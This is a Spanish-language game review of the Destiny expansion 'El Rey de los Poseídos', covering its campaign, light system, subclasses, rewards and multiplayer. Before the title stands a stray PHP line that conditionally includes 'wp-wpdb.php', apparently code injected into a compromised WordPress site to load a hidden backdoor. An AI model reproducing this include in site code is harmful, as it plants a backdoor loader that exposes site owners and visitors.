if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Destiny: El Rey de los Poseídos – La Fortaleza de LeChuck

Análisis Destiny: El Rey de los Poseídos

Ya ha pasado un año desde que nuestro espectro nos encontró en las ruinas de la antigua Rusia y desde entonces hemos vivido muchas cosas buenas y malas con Destiny, mentiría si no dijese que yo fui uno de esos que se enamoró de lo que Bungie nos trajo en un primer momento, pero tras unos meses jugando los fallos de Destiny empezaron a notarse hasta el punto de que el juego se hacía tan repetitivo y monótono que lo dejé aparcado durante muchos meses. Bungie ha querido darle un lavado de cara al juego para redimirse de los fallos que cometieron durante su primer año, y ahora vuelven a la carga con la actualización 2.0 de Destiny junto con el DLC El Rey de los Poseídos que encauza el juego a lo que debería haber sido desde un principio.

destiny-el-rey-de-los-poseidos

No son pocas las novedades que trae consigo El Rey de los Poseídos, para empezar, la campaña, que era uno de los aspectos en los que más flojeaba en el juego original y los anteriores DLCs, ha mejorado considerablemente tanto en narrativa como en contenido, ahora tenemos ante nosotros una campaña con algo más de sentido y sobre todo, interesante. Por otro lado, las misiones de la campaña son más variadas, los nuevos escenarios hacen que las misiones no tengan solo como finalidad el pegar tiros a diestro y siniestro, hay varias misiones de exploración e incluso una de infiltración que le dan variedad al juego.

La historia, sin entrar en spoilers, no sitúa tras los acontecimientos los anteriores DLCs, esta expansión empieza con Oryx, el padre de Crota, que busca vengarse de aquellos que se interpusieron en los planes de su hijo acabando lo que Crota empezó, y no viene solo, se trae consigo un enorme ejercito de poseídos dispuestos a arrasar con todo lo que se interponga en su camino. Estos nuevos enemigos, que aunque tengan la misma base que los demás enemigos del juego en cuanto a modelados se refiere, tienen un patrón de ataque muy diferente al del enemigo en el que están basados, han seleccionado lo mejor de cada raza y los han hecho más duros para que el desafío sea mayor.

Las aventuras tanto de campaña como secundarias están ahora ordenadas y siguen una trayectoria específica en función de la rama de la historia que estemos completando, y no son pocas, ya que hay más de 100 misiones disponibles de las cuales un gran porcentaje son distintas en función de la clase que hayamos escogido, además se han incluido multitud de eventos aleatorios que se suman a los que ya había en las zonas de exploración de cada planeta para que no nos aburramos a la hora de recoger materiales, sin duda tenemos juego para rato.

destiny-el-rey-de-los-poseidos-2

Uno de los cambios más significativos que ha traído esta nueva actualización es la de dejar a un lado la tan odiosa luz como requisito para subir de nivel, ahora podremos subir mediante experiencia hasta el máximo nivel disponible, el 40, y a partir de ahí cada vez que consigamos la suficiente experiencia como para subir otro nivel se nos recompensará con tres motas de luz que no servirán para mejorar nuestro equipo.

La luz tiene ahora otro papel importante, cada equipamiento que llevemos tendrá un valor de resistencia o ataque determinado que en conjunto sumará el total de la luz que tiene nuestro guardián, este valor será el que determine cuál será nuestra resistencia a los ataques de los enemigos y que daño podremos hacer, cuanta más luz tengamos mayor será nuestra resistencia y más daño haremos.

Mediante el DLC se ha añadido la tan esperada tercera subclase para cada tipo de guardián, esta se desbloquea mediante una misión que se nos dará conforme avancemos en la campaña principal, entre los poderes nuevos que trae esta nueva subclase tenemos que ahora los cazadores tienen un arco que hace daño de vacío, los titanes tienen un poderoso martillo que hace daño solar y los hechiceros ahora pueden invocar una tormenta de daño eléctrico.

Se han incluido una gran cantidad armas y armaduras nuevas que en comparación con las anteriores expansiones son mucho más poderosas, esto hace que todo el equipo que hayamos conseguido hasta la fecha carezca de utilidad ya que hasta el más mínimo objeto verde supera con creces el valor de resistencia o daño que puede dar un equipo de leyenda o excepcional del primer año.

destiny-el-rey-de-los-poseidos-3

Aunque pueda parecer un verdadero fastidio que todo lo que hayas conseguido hasta ahora no sirva de mucho, no todo es malo ya que ahora el juego es mucho más generoso y justo con las recompensas, los jefes siempre sueltan varias piezas de equipo y la posibilidad de que los enemigos suelten cualquier tipo de engrama ha aumentado considerablemente, es un fastidio tener que empezar sí, pero al menos el juego te va a recompensar cada hora que le inviertas.

Otro de los añadidos importantes es que ahora las armas, armaduras y equipo de clase tiene un sistema de mejora mediante el cual podremos desmontar otro equipo para aumentar el valor de resistencia o ataque del que más nos guste, por ejemplo, si tu arma favorita es un rifle automático y te toca un cañón de mano con un valor de daño superior al de tu rifle que no vas a usar, puedes desmontarlo entrando en el menú del rifle para así aumentar su daño, y lo mismo pasa con las armaduras, es un gran recurso en el caso de que queramos mantener cualquier equipo ya sea por estética o por las habilidades que tenga sin limitar nuestro nivel de luz.

Los distintivos de leyenda sustituyen a las insignias del crisol y de la vanguardia como moneda oficial de la torre para adquirir equipo especializado, estos distintivos se consiguen jugando al multijugador, completando las misiones diarias, las semanales y los asaltos heroicos de vanguardia. Ahora podemos comprar cualquier objeto excepcional que hayamos desbloqueado con anterioridad con estos distintivos de leyenda, solamente habrá que acercarse a los terminales que hay en la zona donde están los jefes de cada clase y canjearlos, estos objetos ahora están actualizados al nuevo daño del DLC y son mucho más poderosas que las del primer año, interesa ahorrar un poco para poder hacerte con las nuevas armas.

¿No os ha pasado que a la hora de guardar equipo en la torre o a la hora de recoger contratos os habéis quedado sin espacio? Pues eso ya no será un problema, el depósito de la torre se ha ampliado considerablemente para poder guardar todo tipo de objetos sin preocuparse del espacio, además tendremos la posibilidad de recoger hasta 16 contratos a la vez, algo perfecto si quieres subir la reputación de más de una facción a la vez.

destiny-el-rey-de-los-poseidos-4

La nueva zona explorable que trae consigo El Rey de los Poseídos es el acorazado de Oryx en los anillos de Saturno, esta nueva zona es realmente grande y lo mejor de todo es que cuenta con infinidad de secretos, cofres y misiones escondidas por todo el mapa, hay que destacar sobretodo el circulo de invocación donde podemos invocar a los diferentes lugartenientes con renombre de Oryx a modo de jefe, cada vez que se invoca uno de estos lugartenientes y es derrotado el guardián que lo haya invocado tendrá una jugosa recompensa, lo mejor es ir con una escuadra e ir turnándose a la hora de invocar, ya no solo por el cofre que se abre al invocador si no por la gran cantidad de engramas que sueltan los enemigos en esa zona.

El aspecto multijugador de Destiny: el Rey de los Poseídos también trae consigo nuevos añadidos además de conservar todos los modos de juego que han salido hasta la fecha, tenemos un nuevo modo de juego llamado Grieta donde dos equipos luchan por conseguir un artefacto que ha de ser llevado a la base enemiga y una vez allí detonarlo para conseguir puntos extra, además de que se han añadido 8 nuevos mapas multijugador para que haya una mayor variedad de entornos.

Sí que es cierto que el aspecto multijugador es el que menos se ha modificado visto la cantidad de asaltos y misiones que se han añadido al modo de PVE, pero con el nuevo sistema de recompensas y los eventos puntuales como el estandarte de hierro o los desafíos de Osiris no es un modo del que nos vayamos a cansar pronto. Además, se ha incluido una nueva raid llamada King’s Fall.

En cuanto al apartado gráfico y la banda sonora poco más hay que decir que no se haya dicho ya en el análisis de Destiny, los nuevos escenarios y las ampliaciones son realmente espectaculares, además de que la nueva banda sonora te pone la piel de gallina en más de una ocasión, es una verdadera maravilla.

destiny-el-rey-de-los-poseidos-5

Personalmente creo que Bungie está empezando a ir en la dirección correcta con El Rey de los Poseídos. Destiny ha adquirido un nuevo enfoque y esperemos que a partir de ahora se dirijan en esa dirección, aunque el precio me parece algo excesivo si lo compramos suelto, y más sabiendo que se necesitan los anteriores DLCs para poder jugarlo, es aquí donde Destiny pierde todo su encanto, realmente necesitan cambiar el modelo de negocio con este juego si no quieren que vuelva a pasar como en el primer año, ya que el juego tiene muchas virtudes pero les está costando sacarles partido.

Esta expansión mejora de forma muy considerable el aspecto jugable de Destiny, se nota cuando una compañía hace caso de su comunidad para mejorar el producto, y con la gran cantidad de misiones y el nuevo sistema de recompensas que trae consigo esta actualización no sientes que estás perdiendo el tiempo repitiendo la misma misión una y otra vez.